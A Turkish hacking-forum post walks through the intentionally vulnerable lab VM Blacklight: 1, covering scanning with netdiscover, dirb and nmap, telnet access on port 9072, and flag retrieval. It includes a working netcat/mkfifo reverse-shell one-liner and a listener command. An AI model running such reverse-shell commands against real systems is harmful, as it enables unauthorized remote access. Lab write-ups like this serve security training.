Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz BölümBlacklight: 1 Zafiyetli Makine Çözümü // Qwx

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-02-2019 21:01   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 408


Blacklight: 1 Zafiyetli Makine Çözümü // QwxBlacklight: 1 Zafiyetli Makine Çözümü

Blacklight: 1

İsim: Blacklight: 1
Yazar: Carter B
Seri: Blacklight
Açıklama: Recommend that you use VirtualBox


Makinemizi açtık, makinemizin giriş kısmının görünümü bu şekildedir.İlk olarak makinemizin IP'sini öğrenmek adına netdiscover komutumuzu kullanıyoruz.Bulmuş olduğumuz makine IP adresini ziyaret ettiğimizde karşımıza çıkanlar bunlardır. İpucu olarak ilk bayrağın web yolunda olduğunu söylemektedir. En aşağıda da bir javascript kodu dikkat çekiyor.IP adresimizde alt dizinleri kontrol etmek adına dirb adlı aracımızı kullanıyoruz.
dirb http://<adress>Evet dirb sonuçlarını kontrol ettiğimiz zaman robots.txt'de flag1'imizin yolunu göstermiş bulunmaktadır. İlgili dizine gidip flag1'i elde ediyoruz.
fc4c7223964a26b152823d14f129687207e7fe15
Flag1'i bulduğumuz dizinde bize bırakılmış bir ipucu vardır. Diğer flag için /home dizinini kastediyor olabilir. 9072'de açık bırakılan bir port numarası olabilir şimdi Nmap taraması yaparak makinemizdeki açık olan portları listeleyeceğiz. nmap -sS -sV <adress> Bu komut ile arama yaptığımız zaman düşündüğümüz 9072 portunu bulamıyoruz. Onun için aracımızın iki değer arasında arama yapması için -p<kucukdeger>-<buyukdeger> kodunu ekliyoruz.
Sırada 9072 portunu kullanarak sisteme bağlanmak vardır. Bunun için Telnet kullanıyoruz. telnet <adress> 9072 Giriş sağladık bize dediği üzere .help komutunu giriyoruz. .readhash açıklamasında bizlere ipucunu vermektedir. .redhash komutunu giriyoruz ve bize Flag2'yi veriyor. b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932 a828b5c52ef5a6
Alt kısımda yine bir ipucu çıkıyor bu komut sunucu içerisindeki son komutumuz olacaktır. Bizde etkileşimli kabuk için reverse shell olarak netcat komutunu çalıştıracağız.
Shellimizi çalıştırmadan önce dinlemeye almayı unutmayınız onun için yeni bir sekmede kodumuz; nc -lnvp 1234 Shell için kodumuz; .exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <urlocaladress> 1234 >/tmp/fSisteme root olarak giriş elde ettik ilk ip ucunda /home dizinini bize hedef olarak göstermişti şimdi /home dizinine giriş yapıyoruz ardından flag'ı arıyoruz. Kodlarımız sırasıyla; cd /home ; cd blacklight ; cat hash.txt ;; ve son flag'ımızıda bulduk.
___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau